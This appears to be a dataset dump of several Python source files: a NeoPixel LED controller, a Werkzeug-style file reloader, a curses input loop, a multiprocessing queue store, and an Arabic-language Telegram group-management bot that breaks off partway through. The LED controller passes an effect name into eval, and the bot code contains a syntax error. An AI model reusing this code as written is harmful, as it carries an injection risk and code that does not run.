source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
controller.py
|
from __future__ import print_function
from color import Color
from mock import MagicMock, patch
from effects import *
import os
import threading
import time
try:
from neopixel import Adafruit_NeoPixel as Adafruit_Neopixel
except ImportError:
print("[Neopixel][error] An error occurred importing 'neopixel.Adafruit_NeoPixel'")
mock = MagicMock()
mock.begin.return_value = True
mock.show.return_value = True
mock.setBrightness.return_value = True
mock.setPixelColor.return_value = True
with patch.dict('sys.modules', {'neopixel': mock, 'neopixel.Adafruit_NeoPixel': mock.Adafruit_NeoPixel}):
from neopixel import Adafruit_NeoPixel as Adafruit_Neopixel
class Controller:
LEDS = None
NEOPIXEL_GPIO_PIN = None
NEOPIXEL_FREQUENCY = None
NEOPIXEL_DMA = None
NEOPIXEL_INVERT = None
NEOPIXEL_BRIGHTNESS = None
NEOPIXEL_CHANNEL = None
NEOPIXEL_STRIP = None
neopixel = None
thread = None
effect = None
def __init__(self, leds, neopixel_gpio_pin, neopixel_frequency, neopixel_dma, neopixel_invert, neopixel_brightness, neopixel_channel, neopixel_strip):
print("[Neopixel][info] Initialising NeoPixel")
self.LEDS = leds
self.NEOPIXEL_GPIO_PIN = neopixel_gpio_pin
self.NEOPIXEL_FREQUENCY = neopixel_frequency
self.NEOPIXEL_DMA = neopixel_dma
self.NEOPIXEL_INVERT = neopixel_invert
self.NEOPIXEL_BRIGHTNESS = neopixel_brightness
self.NEOPIXEL_CHANNEL = neopixel_channel
self.NEOPIXEL_STRIP = neopixel_strip
self.neopixel = Adafruit_Neopixel(
self.LEDS,
self.NEOPIXEL_GPIO_PIN,
self.NEOPIXEL_FREQUENCY,
self.NEOPIXEL_DMA,
self.NEOPIXEL_INVERT,
self.NEOPIXEL_BRIGHTNESS,
self.NEOPIXEL_CHANNEL,
self.NEOPIXEL_STRIP
)
try:
self.neopixel.begin()
except AttributeError:
print("[Neopixel][error] An error occurred initialising NeoPixel")
def pixel_color(self, pixel, color):
print("[Controller][info] Setting color: '%s' to NeoPixel pixel '%d'" % (color.get_hex(), pixel))
try:
self.neopixel.setPixelColor(pixel, color.get_bit())
self.neopixel.show()
except AttributeError:
print("[Controller][error] An error occurred setting color to NeoPixel pixel")
def color_wheel(self, pos):
print("[Controller][info] Generation a color wheel")
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def brightness(self, brightness):
print("[Controller][info] Setting brightness: '%d' to NeoPixel pixels" % (brightness))
try:
self.neopixel.setBrightness(brightness)
self.neopixel.show()
except AttributeError:
print("[Neopixel][error] An error occurred setting brightness on NeoPixel")
def color(self, color):
print("[Controller][info] Setting color: '%s' to NeoPixel pixels" % (color.get_hex()))
try:
for i in range(self.LEDS):
self.pixel_color(i, color)
self.neopixel.show()
except AttributeError:
print("[Controller][error] An error occurred setting color to NeoPixel pixels")
def start_effect(self, effect, color):
print("[Controller][info] Starting effect: '%s' to NeoPixel pixels" % (effect))
try:
self.effect = eval(effect + '.' + effect.replace('_', ' ').title().replace(' ', ''))(self)
self.thread = threading.Thread(target=self.effect.run, args=(color,))
self.thread.daemon = True
self.thread.start()
except AttributeError:
print("[Controller][error] An error occurred starting effect to NeoPixel pixels")
def stop_effect(self):
print("[Controller][info] Stopping effect to NeoPixel pixels")
try:
if self.effect is not None:
self.effect.stop()
except AttributeError:
print("[Controller][error] An error occurred stopping effect to NeoPixel pixels")
def quit_effect(self):
print("[Controller][info] Quitting effect to NeoPixel pixels")
try:
if self.effect is not None:
self.thread.terminate()
except AttributeError:
print("[Controller][error] An error occurred quitting effect to NeoPixel pixels")
def effects(self):
print("[Controller][info] Getting a list of NeoPixel effects")
try:
effects = [file for file in os.listdir('./neopixelcontroller/lib/effects') if not file.startswith('.') and not file.startswith('__init__') and not file.endswith('.pyc') and not file.startswith('effect_test')]
return [effect.replace('.py', '') for effect in effects]
except AttributeError:
print("[Controller][error] An error occurred get NeoPixel effects")
def clear(self):
print("[Controller][info] Clearing pixels on NeoPixel")
try:
self.stop_effect()
self.quit_effect()
self.color(Color(0, 0, 0))
self.brightness(0)
except AttributeError:
print("[Controller][error] An error occurred clearing all pixels on NeoPixel")
def cleanup(self):
print("[Controller][info] NeoPixel clean up")
self.clear()
def __exit__(self):
print("[Controller][info] NeoPixel exit")
self.cleanup()
|
_reloader.py
|
import fnmatch
import os
import subprocess
import sys
import threading
import time
import typing as t
from itertools import chain
from pathlib import PurePath
from ._internal import _log
# The various system prefixes where imports are found. Base values are
# different when running in a virtualenv. The stat reloader won't scan
# these directories, it would be too inefficient.
prefix = {sys.prefix, sys.base_prefix, sys.exec_prefix, sys.base_exec_prefix}
if hasattr(sys, "real_prefix"):
# virtualenv < 20
prefix.add(sys.real_prefix) # type: ignore
_ignore_prefixes = tuple(prefix)
del prefix
def _iter_module_paths() -> t.Iterator[str]:
"""Find the filesystem paths associated with imported modules."""
# List is in case the value is modified by the app while updating.
for module in list(sys.modules.values()):
name = getattr(module, "__file__", None)
if name is None:
continue
while not os.path.isfile(name):
# Zip file, find the base file without the module path.
old = name
name = os.path.dirname(name)
if name == old: # skip if it was all directories somehow
break
else:
yield name
def _remove_by_pattern(paths: t.Set[str], exclude_patterns: t.Set[str]) -> None:
for pattern in exclude_patterns:
paths.difference_update(fnmatch.filter(paths, pattern))
def _find_stat_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Returns imported
module files, Python files under non-system paths. Extra files and
Python files under extra directories can also be scanned.
System paths have to be excluded for efficiency. Non-system paths,
such as a project root or ``sys.path.insert``, should be the paths
of interest to the user anyway.
"""
paths = set()
for path in chain(list(sys.path), extra_files):
path = os.path.abspath(path)
if os.path.isfile(path):
# zip file on sys.path, or extra file
paths.add(path)
for root, dirs, files in os.walk(path):
# Ignore system prefixes for efficience. Don't scan
# __pycache__, it will have a py or pyc module at the import
# path. As an optimization, ignore .git and .hg since
# nothing interesting will be there.
if root.startswith(_ignore_prefixes) or os.path.basename(root) in {
"__pycache__",
".git",
".hg",
}:
dirs.clear()
continue
for name in files:
if name.endswith((".py", ".pyc")):
paths.add(os.path.join(root, name))
paths.update(_iter_module_paths())
_remove_by_pattern(paths, exclude_patterns)
return paths
def _find_watchdog_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Looks at the same
sources as the stat reloader, but watches everything under
directories instead of individual files.
"""
dirs = set()
for name in chain(list(sys.path), extra_files):
name = os.path.abspath(name)
if os.path.isfile(name):
name = os.path.dirname(name)
dirs.add(name)
for name in _iter_module_paths():
dirs.add(os.path.dirname(name))
_remove_by_pattern(dirs, exclude_patterns)
return _find_common_roots(dirs)
def _find_common_roots(paths: t.Iterable[str]) -> t.Iterable[str]:
root: t.Dict[str, dict] = {}
for chunks in sorted((PurePath(x).parts for x in paths), key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node, path):
for prefix, child in node.items():
_walk(child, path + (prefix,))
if not node:
rv.add(os.path.join(*path))
_walk(root, ())
return rv
def _get_args_for_reloading() -> t.List[str]:
"""Determine how the script was executed, and return the args needed
to execute it again in a new process.
"""
rv = [sys.executable]
py_script = sys.argv[0]
args = sys.argv[1:]
# Need to look at main module to determine how it was executed.
__main__ = sys.modules["__main__"]
# The value of __package__ indicates how Python was called. It may
# not exist if a setuptools script is installed as an egg. It may be
# set incorrectly for entry points created with pip on Windows.
if getattr(__main__, "__package__", None) is None or (
os.name == "nt"
and __main__.__package__ == ""
and not os.path.exists(py_script)
and os.path.exists(f"{py_script}.exe")
):
# Executed a file, like "python app.py".
py_script = os.path.abspath(py_script)
if os.name == "nt":
# Windows entry points have ".exe" extension and should be
# called directly.
if not os.path.exists(py_script) and os.path.exists(f"{py_script}.exe"):
py_script += ".exe"
if (
os.path.splitext(sys.executable)[1] == ".exe"
and os.path.splitext(py_script)[1] == ".exe"
):
rv.pop(0)
rv.append(py_script)
else:
# Executed a module, like "python -m werkzeug.serving".
if sys.argv[0] == "-m":
# Flask works around previous behavior by putting
# "-m flask" in sys.argv.
# TODO remove this once Flask no longer misbehaves
args = sys.argv
else:
if os.path.isfile(py_script):
# Rewritten by Python from "-m script" to "/path/to/script.py".
py_module = t.cast(str, __main__.__package__)
name = os.path.splitext(os.path.basename(py_script))[0]
if name != "__main__":
py_module += f".{name}"
else:
# Incorrectly rewritten by pydevd debugger from "-m script" to "script".
py_module = py_script
rv.extend(("-m", py_module.lstrip(".")))
rv.extend(args)
return rv
class ReloaderLoop:
name = ""
def __init__(
self,
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
) -> None:
self.extra_files: t.Set[str] = {os.path.abspath(x) for x in extra_files or ()}
self.exclude_patterns: t.Set[str] = set(exclude_patterns or ())
self.interval = interval
def __enter__(self) -> "ReloaderLoop":
"""Do any setup, then run one step of the watch to populate the
initial filesystem state.
"""
self.run_step()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Clean up any resources associated with the reloader."""
pass
def run(self) -> None:
"""Continually run the watch step, sleeping for the configured
interval after each step.
"""
while True:
self.run_step()
time.sleep(self.interval)
def run_step(self) -> None:
"""Run one step for watching the filesystem. Called once to set
up initial state, then repeatedly to update it.
"""
pass
def restart_with_reloader(self) -> int:
"""Spawn a new Python interpreter with the same arguments as the
current one, but running the reloader thread.
"""
while True:
_log("info", f" * Restarting with {self.name}")
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ["WERKZEUG_RUN_MAIN"] = "true"
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename: str) -> None:
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename: str) -> None:
filename = os.path.abspath(filename)
_log("info", f" * Detected change in {filename!r}, reloading")
class StatReloaderLoop(ReloaderLoop):
name = "stat"
def __enter__(self) -> ReloaderLoop:
self.mtimes: t.Dict[str, float] = {}
return super().__enter__()
def run_step(self) -> None:
for name in chain(_find_stat_paths(self.extra_files, self.exclude_patterns)):
try:
mtime = os.stat(name).st_mtime
except OSError:
continue
old_time = self.mtimes.get(name)
if old_time is None:
self.mtimes[name] = mtime
continue
if mtime > old_time:
self.trigger_reload(name)
class WatchdogReloaderLoop(ReloaderLoop):
def __init__(self, *args, **kwargs) -> None:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
super().__init__(*args, **kwargs)
trigger_reload = self.trigger_reload
class EventHandler(PatternMatchingEventHandler): # type: ignore
def on_any_event(self, event):
trigger_reload(event.src_path)
reloader_name = Observer.__name__.lower()
if reloader_name.endswith("observer"):
reloader_name = reloader_name[:-8]
self.name = f"watchdog ({reloader_name})"
self.observer = Observer()
# Extra patterns can be non-Python files, match them in addition
# to all Python files in default and extra directories. Ignore
# __pycache__ since a change there will always have a change to
# the source file (or initial pyc file) as well. Ignore Git and
# Mercurial internal changes.
extra_patterns = [p for p in self.extra_files if not os.path.isdir(p)]
self.event_handler = EventHandler(
patterns=["*.py", "*.pyc", "*.zip", *extra_patterns],
ignore_patterns=[
"*/__pycache__/*",
"*/.git/*",
"*/.hg/*",
*self.exclude_patterns,
],
)
self.should_reload = False
def trigger_reload(self, filename: str) -> None:
# This is called inside an event handler, which means throwing
# SystemExit has no effect.
# https://github.com/gorakhargosh/watchdog/issues/294
self.should_reload = True
self.log_reload(filename)
def __enter__(self) -> ReloaderLoop:
self.watches: t.Dict[str, t.Any] = {}
self.observer.start()
return super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self.observer.stop()
self.observer.join()
def run(self) -> None:
while not self.should_reload:
self.run_step()
time.sleep(self.interval)
sys.exit(3)
def run_step(self) -> None:
to_delete = set(self.watches)
for path in _find_watchdog_paths(self.extra_files, self.exclude_patterns):
if path not in self.watches:
try:
self.watches[path] = self.observer.schedule(
self.event_handler, path, recursive=True
)
except OSError:
# Clear this path from list of watches We don't want
# the same error message showing again in the next
# iteration.
self.watches[path] = None
to_delete.discard(path)
for path in to_delete:
watch = self.watches.pop(path, None)
if watch is not None:
self.observer.unschedule(watch)
reloader_loops: t.Dict[str, t.Type[ReloaderLoop]] = {
"stat": StatReloaderLoop,
"watchdog": WatchdogReloaderLoop,
}
try:
__import__("watchdog.observers")
except ImportError:
reloader_loops["auto"] = reloader_loops["stat"]
else:
reloader_loops["auto"] = reloader_loops["watchdog"]
def ensure_echo_on():
"""Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after a reload."""
# tcgetattr will fail if stdin isn't a tty
if sys.stdin is None or not sys.stdin.isatty():
return
try:
import termios
except ImportError:
return
attributes = termios.tcgetattr(sys.stdin)
if not attributes[3] & termios.ECHO:
attributes[3] |= termios.ECHO
termios.tcsetattr(sys.stdin, termios.TCSANOW, attributes)
def run_with_reloader(
main_func: t.Callable[[], None],
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
reloader_type: str = "auto",
):
"""Run the given function in an independent Python interpreter."""
import signal
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
reloader = reloader_loops[reloader_type](
extra_files=extra_files, exclude_patterns=exclude_patterns, interval=interval
)
try:
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
ensure_echo_on()
t = threading.Thread(target=main_func, args=())
t.setDaemon(True)
# Enter the reloader to set up initial state, then start
# the app thread and reloader update loop.
with reloader:
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
|
inp.py
|
import curses
import queue
import threading
import wchar
import config
import debug
class Input(queue.Queue):
def __init__(self, ui):
super().__init__(0)
self.ui = ui
self.commands = self.ui.commands
self.keys = self.commands.keys
self.actions = self.__init_actions()
threading.Thread(target=self.__input_loop, daemon=True).start()
def __init_actions(self):
ui = self.ui
actions = {}
pairs = [
[config.UP, ui.up],
[config.DOWN, ui.down],
[config.LEFT, ui.player.seek_backward],
[config.RIGHT, ui.player.seek_forward],
[config.VOLUP, ui.player.vol_up],
[config.VOLDOWN, ui.player.vol_down],
[config.MUTE, ui.mute],
[config.PLAYPAUSE, ui.player.play_pause],
[config.QUIT, ui.set_die],
[config.SWITCH, ui.switch_view],
[config.COMMAND, ui.commands.prepare_command],
[config.SELECT, ui.select],
[config.HIGHLIGHT, ui.highlight],
[config.TRANSFER, ui.transfer],
[config.DELETE, ui.delete],
[config.CUR_PLAY, ui.jump_cur_play],
[config.JUMP_UP, ui.jump_up],
[config.JUMP_DOWN, ui.jump_down],
[{curses.KEY_RESIZE}, ui.resize],
]
for key, val in pairs:
actions.update(dict.fromkeys(key, val))
return actions
def exe(self):
#check input queue for stuff to do
func, *args = self.get()
#execute item in queue
func(*args)
def get_key(self):
key = self.ui.stdscr.get_wch()
return key
def handle_input(self, key):
if key in self.keys:
if self.keys[key]():
return self.keys.get_string()
elif isinstance(key, str):
self.keys.add(key)
self.__print_typing()
def __print_typing(self):
tw = self.ui.textwin
tmp = self.keys.get_string()
tw.print_blank(x=1, y=0)
tw.win.addnstr(0, 1, wchar.set_width(tmp, tw.w - 1), tw.w - 1)
wid, _ = wchar.wcswidth(tmp[:self.keys.index])
wid += 1
tw.win.chgat(0, wid, 1, curses.A_STANDOUT)
if wid < tw.w:
tw.win.move(0, wid)
def __input_loop(self):
while True:
self.commands.command_event.wait()
key = self.get_key()
if key and self.commands.inp:
command = self.handle_input(key)
if command != None:
self.put_nowait((self.commands.from_command, command,))
elif key in self.actions:
self.put_nowait((self.actions[key],))
if key in config.COMMAND:
self.commands.command_event.clear()
|
queue_store.py
|
'''
'''
import time
import threading
import multiprocessing as mp
from ctypes import c_bool
import remoteobj
from . import SharedPointer, Store, Customer, Queue
class _RemoteTraceback(Exception):
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
class QueueCustomer(Customer):
'''A customer that requests values from a Queue Store.'''
cache = None
def __init__(self, *a, serializer=None, **kw):
super().__init__(*a, **kw)
self.requested = mp.Value(c_bool, False, lock=False)
self.data_queue = Queue(serializer)
self.store.customers.append(self) # circular reference - garbage collection issue?
def empty(self):
return self.store.quit.value or super().empty()
def next(self):
self.cache = None
super().next()
def _get(self):
if self.cache is None:
if not self.store.error.value:
if self.store.quit.value:
raise RuntimeError('Store is not running.')
self.requested.value = True
v = self.data_queue.get()
if self.store.error.value:
exc = RuntimeError('Exception {} in {}'.format(v[0], self.store.__class__.__name__))
exc.__cause__ = _RemoteTraceback(v[1])
raise exc
self.cache = v
return self.cache
# class QueuePointer(SharedPointer):
# cache = None
# def __init__(self, size, counter=0, faster_queue=False):
# super().__init__(size, counter)
# self.requested = mp.Value(c_bool, False, lock=False)
# self.data_queue = (
# FasterSimpleQueue(ctx=mp.get_context()) if faster_queue else
# mp.SimpleQueue()
# )
#
# def _get(self):
# if self.cache is None:
# self.requested.value = True
# self.cache = self.data_queue.get()
# return self.cache
class QueueStore(Store):
'''A Store that will push values through a queue when a Customer requests.'''
Pointer = SharedPointer
Customer = QueueCustomer
debug = False
_thread = None
def __init__(self, *a, **kw):
self.customers = []
self.quit = mp.Value(c_bool, False, lock=False)
self.error = mp.Value(c_bool, False, lock=False)
super().__init__(*a, **kw)
def spawn(self):
if self.debug:
print("Spawning producer", self)
self.quit.value = self.error.value = False
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def join(self):
if self._thread is not None:
if self.debug:
print("Joining producer", self)
self.quit.value = True
self._thread.join()
self._thread = None
if self.debug:
print("Joined producer", self)
def _run(self):
if self.debug:
print("Spawned producer", self)
while not self.quit.value:
for c in self.customers:
if c.requested.value:
try:
c.requested.value = False
c.data_queue.put(self.items[c.cursor.pos])
except Exception as e:
self.error.value = True
import traceback
c.data_queue.put((type(e).__name__, traceback.format_exc()))
time.sleep(1e-6)
if self.debug:
print("Exiting producer", self)
|
all.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo, GPranks,IDrank
from utlis.send import send_msg, BYusers, GetLink,Name,Glang,getAge
from utlis.locks import st,getOR
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json, datetime
import importlib
from os import listdir
from os.path import isfile, join
from pyrogram.api.types import InputPeerChat
def allGP(client, message,redis):
type = message.chat.type
userID = message.from_user.id
chatID = message.chat.id
username = message.from_user.username
if username is None:
username = "None"
userFN = message.from_user.first_name
title = message.chat.title
rank = isrank(redis,userID,chatID)
text = message.text
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
redis.hincrby("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
if text :
if re.search(c.setGPadmin,text):
if re.search("@",text):
user = text.split("@")[1]
if re.search(c.setGPadmin2,text):
user = int(re.search(r'\d+', text).group())
if message.reply_to_message:
user = message.reply_to_message.from_user.id
if 'user' not in locals():return False
if GPranks(userID,chatID) == "member":return False
Getus = Bot("getChatMember",{"chat_id":chatID,"user_id":userID})["result"]
if Getus["status"] == "administrator" and not Getus["can_promote_members"]:return False
try:
getUser = client.get_users(user)
userId = getUser.id
userFn = getUser.first_name
if GPranks(userId,chatID) != "member":return False
pr = Bot("promoteChatMember",{"chat_id":chatID,"user_id":userId,"can_change_info":1,"can_delete_messages":1,"can_invite_users":1,"can_restrict_members":1,"can_pin_messages":1})
if pr["ok"]:
T ="<a href=\"tg://user?id={}\">{}</a>".format(userId,Name(userFn))
Bot("sendMessage",{"chat_id":chatID,"text":r.prGPadmin.format(T),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":r.userNocc,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.sors,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton("قناه السورس 📢", url="t.me/otlop12")],[InlineKeyboardButton("تواصل السورس 💬", url="t.me/A_5bot")],[InlineKeyboardButton("شروحات السورس 📑", url="t.me/otlop12")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.mahmoud,text):,
kb = InlineKeyboardMarkup([[InlineKeyboardButton("مطور حودا", url="t.me/MahmoudM2")],[InlineKeyboardButton("7oda", url="tg://user?id=1593178008")],[InlineKeyboardButton("شروحات السورس 📑", url="t.me/otlop12")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.dellink,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton(c.dellink2, url="https://telegram.org/deactivate")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.dellink,"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.ShowO,text) and (rank is not False or rank is not 0 or rank != "vip"):
reply_markup = getOR(rank,r,userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.Showall,"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True,"reply_markup":reply_markup})
if text == "عدد الكروب" and (rank is not False or rank is not 0 ):
from pyrogram.api.functions.channels import GetFullChannel
chat = client.resolve_peer(chatID)
full_chat = client.send(GetFullChannel(channel=chat)).full_chat
Bot("sendMessage",{"chat_id":chatID,"text":r.gpinfo.format(message.chat.title,full_chat.participants_count,full_chat.admins_count,full_chat.kicked_count,full_chat.banned_count,message.message_id),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and not message.reply_to_message:
Ch = True
# if redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
if redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID):
tx = redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID)
rep = {"#age":"{age}","#name":"{name}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
else:
tx = r.IDnPT
if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID):
get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
if get["ok"] == False:
Ch = True
elif get["result"]["total_count"] == 0:
Ch = True
else:
Ch = False
file_id = get["result"]["photos"][0][0]["file_id"]
Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if Ch == True:
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
# if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID) and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
# if get["ok"] == False:
# Ch = True
# elif get["result"]["total_count"] == 0:
# Ch = True
# else:
# Ch = False
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# file_id = get["result"]["photos"][0][0]["file_id"]
# Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
# if Ch == True and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# Bot("sendMessage",{"chat_id":chatID,"text":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
if text == "رتبتي":
t = IDrank(redis,userID,chatID,r)
Bot("sendMessage",{"chat_id":chatID,"text":f"⏏️꒐ موقعك : {t}","reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and message.reply_to_message:
us = message.reply_to_message.from_user.id
rusername = message.reply_to_message.from_user.username
if rusername is None:
rusername = "None"
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
age = getAge(us,r)
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.idus,text) and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID):
user = text.split("@")[1]
try:
getUser = client.get_users(user)
us = getUser.id
rusername = user
if rusername is None:
rusername = "None"
age = getAge(us,r)
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
print(e)
if re.search(c.ShowSudos, text):
tx = (redis.get("{}Nbot:SHOWsudos".format(BOT_ID)) or "")
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.mymsgs:
get = redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.yourmsgs.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.link and not redis.sismember("{}Nbot:showlink".format(BOT_ID),chatID):
get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "none")
Bot("sendMessage",{"chat_id":chatID,"text":r.showGPlk.format(get),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.myedits:
get = redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youredits.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.myaddcontact:
get = redis.hget("{}Nbot:{}:addcontact".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youraddcontact.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if not redis.sismember("{}Nbot:ReplySendBOT".format(BOT_ID),chatID):
if redis.hexists("{}Nbot:TXreplys".format(BOT_ID),text):
tx = redis.hget("{}Nbot:TXreplys".format(BOT_ID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:STreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:STreplys".format(BOT_ID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:GFreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:GFreplys".format(BOT_ID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:VOreplys".format(BOT_ID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:PHreplys".format(BOT_ID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:DOreplys".format(BOT_ID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if not redis.sismember("{}Nbot:ReplySend".format(BOT_ID),chatID):
